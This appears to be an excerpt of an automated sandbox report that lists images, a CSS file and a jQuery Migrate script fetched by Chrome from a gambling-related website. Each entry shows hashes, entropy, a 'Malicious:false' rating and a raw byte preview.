                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 30 x 32, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):616
                                                      Entropy (8bit):7.444942684961581
                                                      Encrypted:false
                                                      SSDEEP:12:6v/7++pi4MNhsOhfotmXt1tVjq53uO0Ldcfz4SPfsDJC05D9:P+pOtQtm91C+O0LdusSPfsD3
                                                      MD5:D78068AA4F691E86A736D5EC0FA45AEE
                                                      SHA1:30E0842662A7F97B84289FB093C3755B99503E40
                                                      SHA-256:12D00217BBF0BA6959F43B8AD1F5BBD0B9F7B63ECD6BE5650BC91AEF21716097
                                                      SHA-512:A0F5AA3F4C004A5BA147FA4FBE283D1E06448DEED3F11112D8700E6C3AC85B67868962E75D406DFEA5A416F3C69C7D43EE5444E7E7DB242C7C5DCDEFF94841CC
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/footer/footer-gibraltar.png?ver=1606790107
                                                      Preview:.PNG........IHDR....... .....2.8M...BPLTE...___...jjjXXXoootttxxxCCC|||...fffKKKRRR999......000...................tRNS.@..f....IDAT(.u.W.$!.DK......[5........R.`{W...>....l.p..j..T..8j;.x....H..{Tsh.....;^|....-h..r........_.[.........N.. .x....z..yO.7..4...]..K%@.r&..L..r.0:...._...8T$T.0..K.A...-.6.d..i.0....(.E.:Q.!..0..o.yHDI.......8....Fhs..A...).0.<...i#...Sh..I..pN%..c.4,...%.._W..9..]e$........q..Q.s).RW..d..]v...^..|..w...$...._r.[...v5&.D..a..I..B.I`..Nl#q.*.....8h.1T(p..S..E0+.........~..<..i..`"...?.%D_.[Um.._.**AZ..3..].....A.Z...(|{.P*..M%..'.x..}T.._...V...Kj.'....IEND.B`.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):6122
                                                      Entropy (8bit):7.9079178522274445
                                                      Encrypted:false
                                                      SSDEEP:96:7JMDudptzltyUUThLs6wkrOwZeDeG14tLw/fxoikZ+/DU78DWjS3hZyErMi:Dzwts6wOZuHuU/f1++/8GBnIi
                                                      MD5:890C9A5BEC36C9044A195AE6C12626E7
                                                      SHA1:725B0DB0DA614042A73B486B8DE56B9E20DECC81
                                                      SHA-256:48EA55ED828936524AB8F95C5B59E3EF3732DBEE70995808ED1AAE0FD75FA1AD
                                                      SHA-512:38AD120712ACBA2E52B92CEA45CCF8FB5BBEC308FA2973751886A0D269CC65196176943015C889B558F5A4E55814FB0B97B7680C3897C89F425FF3CD655BD319
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR..............P......gAMA......a.....sRGB.........PLTE......y..{..{...........v.......................~......f....~.................`....Z..|.......q..t..b..d.........f..c..e..Z....t..|....t..y....a....\..\..c..........S..v.............u...................q..f.....................n..D..@..:..@.............z..X....s..+............n~...}..~..{..{....r....s..m..k..\..j..g..v..y....n..b..e..x..h..p..|....x..a...._..d..t......M...........~....w..=..W..Y....u..V..Z..u..H..|......T......P..M....S....`..-..U..A...."..o....c..Q.........P..m..S.......W..6.........J..3........c........[..q..K..Y..I.....j.......g.....].....*..'......C..E.....e...........u.......9..:...}..........1........u.....C..'.. |.........:..M....0..5....eS...ktRNS.$.0..8.......fE..\@R.,..y.rO.....?.r.h.z.. .Q.).4..}@....a.......a..X.........bn..........y........|....IDATx..y\.g......>..RAP..A.(...#.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):4690
                                                      Entropy (8bit):7.805157800626379
                                                      Encrypted:false
                                                      SSDEEP:96:WYrfm0AhWPx3/qs4dp/Jch92YNFaDFfEiUlcffXLcC55i7xCXP52K:WeEg/qnrGv7uAcnbcC5aCB2K
                                                      MD5:4223F6C99139CC63EBF5FEDC473EFED2
                                                      SHA1:C5EAE4D521384CA3DFC1D071C20B4CBC51822624
                                                      SHA-256:DC4B7B0A3C7E57CA27EEF8C44A93CDFC7B3C8BB4F409C0D94BED52E642F21044
                                                      SHA-512:E89576E34A263A2DF9E5322FEF31EDE619617E144AA5816090AB0558CC8F24835A21A61CC8F4B14A6ADFE2D965237D7B0C9E7EBB7720DE19D6BF133C154ECF69
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/egame/nav/224_egame_logo.png?ver=1711946581
                                                      Preview:.PNG........IHDR..............P......gAMA......a.....sRGB.........PLTE...OOOc..OOOOOOd..c..v4.@q...qOOOOOOPK\....t..OOO....OOOOOO...OOO..OOOOOOOOOOOOOOO..xOOOOOO..OOOOOO....OOOOOO..........OOOOOOm#.OOO..........k..OOO..............z....c..OOOOOOOOOr-.OOOu3.u2................xc..OOOc..u2.o'.OOOv3.t0...u1.........z..xc..v4.v4.v4...yu2.....vv4.c..c..c..u3.v4...s..Ai_..c.....v4.OOOt0.d..r,.j..l .n#.h..p'.f..u1.s/.s..u2.u3.s-.c..e..k..k..j..l..m!.q+.m".q*.q).i..i..p(.h..g..o%.g..g..o&.e..n$.e...I.....l.........l....{..................X...t.....n......p..q..r........<....................N.......w.............c.........}8.........]........V..x.......f.......`....u).....[.....j.................|..u....n .....@..D..q..p......w,.m..i.....y5.p$.u.....s*.y1.q&.r$...w1.t,.G8.....ptRNS...}...Q..`0....q.".?....O.H.$.....E....T.B.i.U_.l5vG.....R...-.\.$=.......*.t.8(.......N..h.....[_\.....y..9...tIDATx..w\.W...#.[.....,((rvMl
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:GIF image data, version 89a, 1 x 594
                                                      Category:dropped
                                                      Size (bytes):376
                                                      Entropy (8bit):6.122718309331428
                                                      Encrypted:false
                                                      SSDEEP:6:2QhIFacOvWtR1mKpK6x1Plkf5hPlis6Y4HTsHBKHTTw9kZ+ey:IFOQ9pJTg5tssqs0Hw9Ley
                                                      MD5:355B2CB853D78AE262C093065EAA6E70
                                                      SHA1:3E8D2A456204E635CFE5BD959CFF47FAF63023FC
                                                      SHA-256:CD58D657E3D79583A5722257D8770E3B5F620F1D58E392F1D9460CC89AC485FA
                                                      SHA-512:0700F78D8D439D90ED2EBA294BCCC07451CEC67B8BF518C13A8221CCCF223A31C9E620F193874149AC818A39A90EFBAA8748607600B01C7C0F89F89B18521042
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:GIF89a..R.....iM.yZ.mP.z[.kN.vW.wW.lO.yZ.rT.uV.pR.qS.jN.nQ.sU.yZ.wX.tV.uW.{Y.xY.oR.zZ.yY.sU.{Z.jM.nP.wX.iL.yX.sT.xX.oQ.rS.pS.uW.xW.kN.wY.y[.{[.tU.{\.zY.z[.hL................................................!.......,......R......pH,...r.l:..tJ.Z..v+.....A&..... h.9..Cd.,...c.H.G. ......+....%..........(.!...&.........)..........*.....-.-......-............,..........A.;
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):29661
                                                      Entropy (8bit):7.990566333693079
                                                      Encrypted:true
                                                      SSDEEP:768:v6vaPjM30l1WGJi3DqwyCW3EIe/PZL8li15YkG773:v6vqQi1WOi0y/PZAnkS
                                                      MD5:5C625B0DBD0F11C99B1E15F0AF92C022
                                                      SHA1:04EC60F16EE4D304B4CC0F4F7D13C814C349EBFB
                                                      SHA-256:61CDC6E42281928A272380CA24ABECD085E40B5E930042F9C9B9C2B6F28FEE9F
                                                      SHA-512:82F3DF7918E763EA0E8A75631467CE564E304FF258601517C89627234C51E6082416AB57BBE8E972A0E873488625B00850D98F795FB64A4866F8313AF796ABBA
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...............^.....PLTE...987...C$.,.....CBA*)) ..S&.`_^`*.TSR...$""...2107)$9..L..stsA..NKIi1.O.&mkh8..A0'.=.....E.@%z||Y2).9"...G8/...t4"~3./".......S+.....B.>&r+.....6....^1.......E(...p_P~I9....S-hrub:+.I+.hNm92O@9..bhk.t_.L3.q<.<............5 .U....}hbTI..{zhZ[K@..{nF7|?*...F$Y...i..b6.vp.c..V.C.G1.W2.&#.rU..L.PB.....l.g/z--..Y^g.".i....q..p_..qRG.wAK...VE.>.<...b.......t.j8.12.{.t..~\H\@6u[.....cQi)..cK..qFGR;@J...............|py..t5....fPA#8...*)...3....V"....>!......8....F.>jG.KRa.V..K.G"{...B..Z.21cT-.d.......y=.m....r[.P.h6............rX|q...z..+1=..........b....w0.s.P.....J.1..$..........@...c.a2..x..s.XE....._g.....^........K.|:......93....T..B.............d.yf..c..c..].m..a.$..p.IDATx.d..O.d...{+...Lp.1....i.5M..c".Nz..T.5Sv......W$..C4J........n...q..c..z.#.h.o..<s..O......|./%.....+O.T.Y%.h..2.(.L...e..L.I-c.Z.di..:!D.d...."tC..5]a.._.66,K.,m..^..x1..|.e..E.Y...{.Zfgzz{...~...j...l...U]i.Z:n..Rv
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):22075
                                                      Entropy (8bit):7.975819153940111
                                                      Encrypted:false
                                                      SSDEEP:384:aF0fRjPUXO6khBtFhV8gjqdYPG8tE1qrei7FHZIdpKOnqL1y8QfnVOEv6in0e3I4:j5oXO62tFElYPjZreg50dnpVu8z3I4
                                                      MD5:7D6C7E7FB4223C3D263458F834FE068F
                                                      SHA1:BA86454A9FEA485E31158BA25CEE658453733086
                                                      SHA-256:82926E342BA9C5074792422FC22DD02D7556519CD9F5E589A2636CAE55E12D86
                                                      SHA-512:1410CB9A80735B0B694EA5C1063D02CECBA4A2C5DE89691096C5D8A83595CEF3047EDFD332E05C12965486F8A19B773F0CB195112535C8E3579DC5706487D57D
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...............^.....PLTE...............................be....im%......X[.......EG.89.RO....*,."*.g.qt..h.............Q...."Z...........z."}......(...)...........9.....*...z/x.^:..f.Ef.Y.i........l...Z...$.....1.1....o..R..,.v......H..9..)..|.L....Y...N.....u.Wl.!a.M.;.V.'...O.D..r..h.U\..C7!..........[f-~....*n.W.0a.,5. +..S..7.....=....6.....*.....Q.FC.&/..N..0....Ly....'.....3...t...a."%I.......4n..I..A.0..,......4JF.....C...........F.Z..v.........6UF-.i#M......ED2o/..x.k.M3..w........BK......}..i..D{.........yQ...g..G.H.+.........pmF...n.a@/.G..m..n..:.gB.J`8....... ...rH?....,.Z......[Z.....?p.$.......k.j1..]?.y2..Ru.J.A0.I7..>..T..CUc)U..4.(&.)..T...m.j.@../l.).]Z.Z.J.-!.l..`..H9.k.o f.F.1:..m...... ..D.....f.w.'...MfX,==k,...T.d5.j..L..20-nn..y......O=...R.IDATx.t...@.Fa...R..E.a..+5m(b9.>.+l.p$...]P +.:......y..._&.....Z...1...v...9.j.\dmJm.1.,.H.y.r.l.<..v.;..h..k..m..B......O^..<..B.yQ..w...rqh......V.#.Q..Pz.J.d.@..phD...^.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):20536
                                                      Entropy (8bit):7.985215977466965
                                                      Encrypted:false
                                                      SSDEEP:384:LE5J4SGkcGwN8mQxX9ns9dR7wK8T8GifNw45AAVtrltxP+LDs3L9Y0cJy:LOJ4FjXQ89zb8T8hfu4zVl4LI7hj
                                                      MD5:7D00FFB99332030D329DB3C5322D488B
                                                      SHA1:B6D2CEE4AB5EB36962099AA6666F16A67E13403C
                                                      SHA-256:276D32F1DECB7AC22E3887FF1EEA75D3AA5BF531474403077E43CFD51261641C
                                                      SHA-512:7C5981A5CA884069D7AC112DF91534DC98FEAE87E0223546681D541AD850C2121A5864E0CD2B5927E6A098848A93A1E3DEA393807E3873E8464C4DA318AC997A
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...............^.....PLTE...........................s..z...........m....................g.....a...............#..P..+........F..w..4.....n.....Y.....=.....`..+....mii.#.....2.5..X......g...................X..?3.N....*.......:.S....*.............-.[...(..,..W....A.....&'"...K......F..h.E......C..=..B....Q..l..[..U.....P..y..>.t.2........`].....6....-................l......9....\.<.....C...7..Y.).......m........f..}.. '..............W0.......~|.U...P..6.)..|........f~.sp.%#.......F......c.N.j..1..6.....*..k....<..$K4..la.w....5.c(.I....W.8..b\\.j=.....{S4...y.b$.X.LF..:,.@!\...Go"8.P".....d..zL^?<>=<.".)%...~}|k$....q.Kg.~..:=.11......RO.((D.....i...,SQQQj=....|....".*5.>A....TW..3.@L.ps.,!](....\X/}9.Z5wK@..`.Y;5..Fm?.L...}H.5.i.).]Tr..1.....3..n.Dt..z.^W:...L.IDATx.|.M..0...t....(Q..^ ...bv^%'.......3.8.D.#M..~.O!N.....b.`.....s../.D."f.....>?e.V...}...).5.H%..&hL..|. j... .....;e8.9..J.?..n.....Y%.r..;-.....A.t...8..b.;...@.w..|M.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):29204
                                                      Entropy (8bit):7.985424524515343
                                                      Encrypted:false
                                                      SSDEEP:768:asxyvvak/BokmrsY5/cMe3DKx7tX+1JUKppvzTxdvr:hsnfokmrsYntaUKp5Tr
                                                      MD5:EB01135BF1C726ABA67CE769C1A76DF1
                                                      SHA1:FC2DE3C701DD4999E428213AA51B92BECECA87D0
                                                      SHA-256:BA56AB2CADB017E0DBC87CF12F663867BD8FB91B27781717F0BBB65B9C4ED4D5
                                                      SHA-512:B037F21808EC800E3502E61BF4664AA0E9BECF93CD2A787416E3381A62E71F5775954642D3C5CB64D0B78A90B710029047FF516B149E8F5167D511E427D94AB4
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/common/storage/game/egame/joker/ddodhamgc71gk.png?ver=1733716011
                                                      Preview:.PNG........IHDR...............^.....gAMA......a.....sRGB.........PLTE...D...!.+.....7.......................T....(.....2..........0....(M.w........Kf....<.(f..S.+}.$L........V|....Nr.i%.`....\.........:.,...........v....-X.5.//o..p...?..n...@E..9Z.A.0.>..T...;V..............-.l..i.-............i.7[....5q.......D..].G..Z*.. ).6..-.....).O...K....@..Q.*M..j4_..FT.....u.$......%dz.oCh..y......A$8.k..0,...yDAx+Z.......fK......$ H..'.M.....C[....-......k1..x....F1m.F../![:.kt....MpmT......$...q.3/.s>.;..U3z......:....P....8....J.I.#B.0;km...2......x.Y..KK.qh....A.U;M.UQ.jh.4..pg...hJ.t..HRD@p...w./.%....}.......@N.L@...........N0....%................._......q.......Q1..W.Kx.E.R....g..9.....P..ikZN.)..^..LR. .~../fZW..u./......m...Q.E..&{k.bm...X!g.Fa0o.....N4-.].. .s.........u.k.....4a6.M.L.F.....!.J.H@:.. .IDATx...<.y.....c.1if..12..D7.mw!..N)..7.$B.P...m..B.EQ.!......:...vkw.....y.v...~..C.......r.....}.|?..R".WK..........jD.......X'']'0]...k..8.q
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 700x255, components 3
                                                      Category:dropped
                                                      Size (bytes):47441
                                                      Entropy (8bit):7.976228730546613
                                                      Encrypted:false
                                                      SSDEEP:768:eCvdC050OpX2aL2FtoXhTGPmCSRbamaVLFF8lJYEicHywHT4lwDL/xZ1nEcUUyUK:vvsxOpXlCFaimC04WJYySw4OxZ1nyUyb
                                                      MD5:EB2D8A58FF346F9444B76488E2BA2965
                                                      SHA1:C7A905F9E9D5C8A210E01BCDBFB0776189B1ED13
                                                      SHA-256:7D586E647BBDB5D8667A809982B429CD1D4C31AA64B491824806692ECA249DCA
                                                      SHA-512:5F2ABDB27FC7F39274D7A933F50952D46B7195CA481D1D15977AF156EDA73AEDE0F434C7129F730A89BD736A2218C413C213167125CD6A3E69BF25DA97306257
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:......JFIF.............C....................................................................C......................................................................................................................................................................................................................................................................|.FJ..I..&...9l"......+.KIB.................................Ks.e.....5...fL...I..j.Q......*..q<......................................U.$.D.5)..,.d."..G..c..GKi.................................$........Y...@,pdY......@...................C.P.yL.|........+..g......iu...et>d.....\....t..............J.;.%......|..=....K...A.y%.|=.v.................W..k...ep....u.d.Zd..^*...iv[\d....d.^~Zn..;Z7Zm..p.[...&........k..#...........H.F..#..X>...........']..l.;6..[.=.......c..-..f...O..../1...\..+c.~....&.m\5 ..........h....Vd..e>...o},Dw...u.....*a....n.V.9..\...2.,NG[.(m.1z.3n.p.|...c......|7p..hm...].../..s:.5.}.b.H.Q..W .=R-G{.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (7085)
                                                      Category:downloaded
                                                      Size (bytes):7199
                                                      Entropy (8bit):5.223786028238701
                                                      Encrypted:false
                                                      SSDEEP:96:tBySz91Gwyk35YrfBewIt9jKLKDs2SFNK7wIDBRANyCfVJ45NI:zySzvGw/35YbMx9jKLKD3UIDBR8VVUq
                                                      MD5:EB05D8D73B5B13D8D84308A4751ECE96
                                                      SHA1:743052320809514FB788FE1D3DF37FC87CE90452
                                                      SHA-256:1E67D8DBCCA1F6FD94E077C85C2FB40FA1C2756C99238DAA8DA882144260A68D
                                                      SHA-512:7B68A43A22A41404A2FF58E0DA6A237492CAD0FC3E56D216980802B4D5FB483895262A7E049340D6670002BDF899BA88C319239E60D0AAE1AC31D98556B0AD6E
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/plus/plugin/js/jquery-migrate.min.js?ver=1606790105
                                                      Preview:/*! jQuery Migrate v1.2.1 | (c) 2005, 2013 jQuery Foundation, Inc. and other contributors | jquery.org/license */.jQuery.migrateMute===void 0&&(jQuery.migrateMute=!0),function(e,t,n){function r(n){var r=t.console;i[n]||(i[n]=!0,e.migrateWarnings.push(n),r&&r.warn&&!e.migrateMute&&(r.warn("JQMIGRATE: "+n),e.migrateTrace&&r.trace&&r.trace()))}function a(t,a,i,o){if(Object.defineProperty)try{return Object.defineProperty(t,a,{configurable:!0,enumerable:!0,get:function(){return r(o),i},set:function(e){r(o),i=e}}),n}catch(s){}e._definePropertyBroken=!0,t[a]=i}var i={};e.migrateWarnings=[],!e.migrateMute&&t.console&&t.console.log&&t.console.log("JQMIGRATE: Logging is active"),e.migrateTrace===n&&(e.migrateTrace=!0),e.migrateReset=function(){i={},e.migrateWarnings.length=0},"BackCompat"===document.compatMode&&r("jQuery is not compatible with Quirks Mode");var o=e("<input/>",{size:1}).attr("size")&&e.attrFn,s=e.attr,u=e.attrHooks.value&&e.attrHooks.value.get||function(){return null},c=e.attrHoo
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 185 x 254, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):10801
                                                      Entropy (8bit):7.968705719481044
                                                      Encrypted:false
                                                      SSDEEP:192:NMcaayfRapu7Rp3mcejKdShy16oeCDf2ZP4WIDPSYLkv6ytNh5F4Wo7SzLOjGxW:Gcbygu7uj016oOt49DPfM6ibPP2SnOcW
                                                      MD5:AA6AED3F61B420D5D00F36E88514F994
                                                      SHA1:8C754C08D585D762CAED294F8000F5BA9666F853
                                                      SHA-256:964A8F497845A500919E745DF7BE0B1634DD7CC8828E8E98E888D05FDB7CC3A5
                                                      SHA-512:5936397FC06076368D1D43BE2055C798FB65313EF52B9B8EF2C7989770CEF81D8C7DF7E38939B2DEC6122D05234621CDA9726031E43EB3F7FAC33B20FDC6F2F0
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR.............Q.T.....PLTE....PI_s..g[.`U.b\.bV.bV.cW.bV.cW.NG.BB.NG.NG...(%+*+5_s..WM.[P.cW.`T....^R('/.ME.PG.RH.KB.TJ.82!")..#.......H@..{....0,.@:......&*3.........A{u....HC....C<....gW.....&......@.z.46..z.o_3pk.TL........l.ZS@DL.....!d].`Y....wYa..Q....s23;........r...WPSSX.....x.......lf]^c.........GT_LLQ.PK..../]p..[P......&........._U......U..H....._...ve..C...........oV...6....[.7..2p.._.......opt..`...XiwRao.v>...o.."ha..N.QK:;@.. ......=vq..$...$]V....As;l.6.....g.WD.VO....yp.JD...L.}.....!...f..Y...xc!`@..4...q..O|vHjt...+.fij-gb..Y..+i..*....q.pf..)..~...Y..?...A.....>..E..xy~..G..7...2i=1.y..Exh*p`.&..n..0..(.xE.`..=.H5IC/.r.*......-~..O....d...D;.9...(..||~.YW..L..0.....e.....[X@UK.o.O.N..#..!...h.....y{g..fX.e#._..^I.K)xP...i.........l........F0....tRNS.y..#B]......C.k...&.IDATx....P...B...u{..(...N.J..>(.:=...u.......J6Q.:%...P.&..2...z...x..:.r.~..........{..3......B.Ms....xz..!...#.=..W..8C.....C4.a'.7.....&..2.Z.33.6..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:GIF image data, version 89a, 224 x 91
                                                      Category:downloaded
                                                      Size (bytes):18406
                                                      Entropy (8bit):7.675664322235163
                                                      Encrypted:false
                                                      SSDEEP:384:XbZPuG48/hDaZaDY76y8MLtbOYh5m/hDaZaD3MLtbOYhA:1GSdaZX76yPtSYhWdaZNtSYhA
                                                      MD5:E421930A8A259A84E6C345E5A139C696
                                                      SHA1:EF5A4B7D2CED985D3E23108030394C34E737A051
                                                      SHA-256:84B7DEDE23DAB781AB48EF1101245D9DD11E8D3BD9BC74B730A37D3031819F69
                                                      SHA-512:D3278E15647C80A89A53CF97682AD94DBDB44B3AA28327B53C80280E6E09F83D21BA6D4B7948C8FEB37D3E467DA1F3C518BE73921DC5B82D96A840B1C9B8F0F0
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/main/logo.gif?ver=1612840274
                                                      Preview:GIF89a..[..........O....,N.M.......=...S..#.Z$.i..*#.Zb....C.~..$......k.EO.M..5@.R#.h..!.. ..&.....(r..3.s..01.U1.V..;...@.Q.....9..7..^.H..3...1.r{.@...z.A@.|.....l..].I...^..........l.D{....63.UR.L..%..?..]q.D.. .. ..]".Z..!b.G..^..)..2a.HB.Q..;y.@6.TK.N..\).X..[a.G..!..2h.E...I.O9.S+.W..#B.PG.O..5..,..%>.R*.X.....*V.K..(..>`.H..\..'k.Ez.@.........!.Z...<.R..1..]......2.U..<x.A/.V...../..=...].I..!..9[.I4.Ul.D..:c.G|.?.."'.Xo.CA.QF.OX.J..=..4..9U.K..$M.M .Z...3.UP.Lw.A...&.Y..[...........^.......................................................................................................................................................................................................................................................................................!..NETSCAPE2.0.....!.......,......[.@...E..H......*\....#J.H....3j.... C...........B........`...%Hd.9..."].X........<8.(P...H......T9.e..:X.!.1@..hC.H.V....p.ek"@A.....5#.......L......+.@.b...*.......;...3c.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:GIF image data, version 89a, 1 x 1
                                                      Category:downloaded
                                                      Size (bytes):43
                                                      Entropy (8bit):3.0950611313667666
                                                      Encrypted:false
                                                      SSDEEP:3:CUMllRPQEsJ9pse:Gl3QEsJLse
                                                      MD5:AD4B0F606E0F8465BC4C4C170B37E1A3
                                                      SHA1:50B30FD5F87C85FE5CBA2635CB83316CA71250D7
                                                      SHA-256:CF4724B2F736ED1A0AE6BC28F1EAD963D9CD2C1FD87B6EF32E7799FC1C5C8BDA
                                                      SHA-512:EBFE0C0DF4BCC167D5CB6EBDD379F9083DF62BEF63A23818E1C6ADF0F64B65467EA58B7CD4D03CF0A1B1A2B07FB7B969BF35F25F1F8538CC65CF3EEBDF8A0910
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://hm.baidu.com/hm.gif?hca=E4D1CF12C6FA10DD&cc=1&ck=1&cl=24-bit&ds=1280x1024&vl=907&et=0&ja=0&ln=en-us&lo=0&lt=1736725677&rnd=1903090938&si=947ea0365dd8ab01fc51bd9439b42930&v=1.3.2&lv=2&sn=48208&r=0&ww=1280&u=https%3A%2F%2Fb45032.com%2Fegame%2F224&tt=bet365%E8%8B%B1%E5%9B%BD%E4%B8%8A%E5%B8%82%E5%AE%98%E7%BD%91
                                                      Preview:GIF89a.............!.......,...........L..;
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):4561
                                                      Entropy (8bit):7.866680088746412
                                                      Encrypted:false
                                                      SSDEEP:96:L7ZdoDdUB/49yQRkqlCr581SIK3gC4yw/44Ie2QaSiT/O:LtCDdUBg9yQRknA4gfysphIq
                                                      MD5:D45F6CB47366C48F4404F841AAF1F736
                                                      SHA1:D718B098AA528C6B22E325D8DB1BF5A211FF189D
                                                      SHA-256:CCED9EA4418D6A8354D10FE74BD7C9A8DCBE26835BA68927A71FCDBC5D01D616
                                                      SHA-512:C43C663CA437E69725CCC982300DFB71F4AB327A5BA9FB6A47C1B68F0057BD45D06D9F022F62EBED41EFC09999D966E455B59EF60F844D165EB42427AC1DA9FF
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/egame/nav/221_egame_logo.png?ver=1606790110
                                                      Preview:.PNG........IHDR..............P......PLTE...I.d4..:..B.xI.b;..H.eA.{H.fP.OC.uE.n3..8..?..B.z9..J.aB.vD.rG.i9..<..:..=..L.X5..:..5..I.eL.Z?..R.H+..T.A6..U.>N.VS.DJ.a9..H.gI.dT.C8..I.c:..?..M.WV.=*..6..<..N.T9..M.X+..6..S.D)..3..+..@.|*..A.}-..,..=..C.uH.g?..J.`*..2..H.g3..+..U.@0..D.rT.D2..C.uN.S...+..7..2..)..-..,..7..*..U.@1..P.OU.?G.j@..U.?2..:..N.TL.YJ.`O.O7..<..0..>..?..@..C.wC.sE.p1..F.mQ.K=..B.z-..6..T.B...9..G.jR.H+..I.d/..4..A.|5..6..H.f4..,..U.>H.h*..K.\0..S.E9......cJ[...etRNS... . @@@0p.....P0....`......@..p@ ....`..pP..........PP...p`@0.......p`P......k.............02).....eIDATx.....@.@.#.....h.....%8..M.B..Ap.D......>?...............%E.wm;M.=.ei...$.T.......b.h...>.".....n=...e..Z].).}=......i.w....}.5..4.0...1.X..5.M8p.@$.c4@kkb .B.W......6..r......}.k.avf(..<..<y..Z..Ok...QF..S,M....Faj...).N.z\..^.)......b....A4..h83..4-.V.p....1.A.i.(k....x.f....b.........{D..2...fF.8!.O.e..#...).bt...G..af.F..Gt.2'...&..D.WWW.%.h."....z..y.9..L.+D...i.D4..Ec..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:gzip compressed data, from Unix, original size modulo 2^32 6938
                                                      Category:downloaded
                                                      Size (bytes):1703
                                                      Entropy (8bit):7.887249966371304
                                                      Encrypted:false
                                                      SSDEEP:48:XlvDQvisAhysldqy3b8mps9xwWs6XeeB7kNKgwYN:V7i7syWprbGaWVu0ANKgwYN
                                                      MD5:0AF757ECD7A95116F3F61566D6992DE2
                                                      SHA1:E68D151A1D4C13BC35AE4F084BC0064E68180F8F
                                                      SHA-256:9B1150F51196267611975FF88CCECEC254C57C99134D5DDA447853306FDB0501
                                                      SHA-512:1284F446AEE8277A747F513BCAAB4C4170B08C5ADE534407D3E04A3ED132FA02A5E8635609ED6BA59C2A6F97A2CACBA316474BA300F56CF43846C4E5436E392A
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/plus/css/unite/prizedraw_pop_unite.css?ver=1733883988
                                                      Preview:...........Xoo.D...OqZ5%.q...:B0.."!.@...%.$.:vp.Ii...66u0.h......&1@cR..]P.n.....vl.u../.;?.<..=..o7.0.!....~..P.p.M.....;...v..&..l.....k.5.D..3..].l.../..u......{].~n...7.k...*k..Z.qmb.......$.Y..0>i........{.4.......#.....`.<..v....^.....V.`.....R..l...A.d..=.<z.B.Z.!..f.Y#..zT{...O A..ZK ......R6. ...5..&..v3...\........_(...E.0....;7$$@.$.....0~..I....j....4.A.{..A%&sU.4].R...5 .H.*..#a.r.L@..+B.Jlu..........V....Jx-*.qQ.J}.X...ba.w`.....No.......r.7.K.0..`..Z.....,...l.>-........k..x.......g.._..9~x......B.t..^..i.B....2......qh....>..@.H...=...)....|R..8......4]}Rv...J=......./."..k...THv..`.`.'.....kt...X..\..jm. U..F]U.......+.?.......J).......P.m@.Q...y.....]..D..6.^]./.s..W2.S...C...a..H^0...-..=..E.....eZ.j./..5.tLG...J.9..^.; h.a.,..`...Q..L........6oAl.t.M.....p)..-.@a..}Dp..B).<.,.l..]b@..<.A/....i...'..'.....Xy..h)w.r.*....=...'9^t.'*..UR..#.].+F.S.U..l..6..T=..3.xe..%..&R..!.M.;....-........?`...../.......0.N.:.b.@.:
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 850 x 332, 8-bit/color RGBA, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):21119
                                                      Entropy (8bit):7.80272011359846
                                                      Encrypted:false
                                                      SSDEEP:384:O+sdVk/P/pDXtoWmRaSn4tmB9I4FQCCh66Yv0x5kOObu:O5du/n4WoRI4FVCh5PObu
                                                      MD5:32A87D100A3AA2D4529EBAD28B40AED8
                                                      SHA1:7C5C6A4BE7545D35BC980C8379534675FE048ADB
